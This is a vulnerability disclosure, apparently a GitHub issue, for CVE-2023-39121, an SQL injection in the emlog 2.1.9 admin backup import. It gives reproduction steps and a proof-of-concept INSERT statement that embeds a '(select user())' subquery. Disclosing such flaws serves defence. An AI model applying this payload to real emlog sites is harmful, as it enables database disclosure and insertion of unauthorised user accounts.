CVE-2023-39121: There is sql injection in the background of emlog 2.1.9. · Issue #1 · safe-b/CVE

1. First log in to the administrator’s background home page, find System -> Data -> Click Start Backup, first get an sql file
   http://127.0.0.1/emlog/admin/data.php
2. Modify the sql file and add a line of code to the user table of the database

POC:
INSERT INTO emlog_user VALUES(‘110’,’’,’$P$BnTaZnToynOoAVP6T/MiTsZc9ZAQNg.’,(select user()),’writer’,’n’,’’,’[email protected]’,’’,’’,’0’,’1687261845’,’1687261845’);
3. Save the sql file - > and then select Import sql file, select the modified sql file just now, click Import, if successful, the import success will be displayed, and then click User module
http://127.0.0.1/emlog/admin/user.php, you’ll find the SQL statement is executed successfully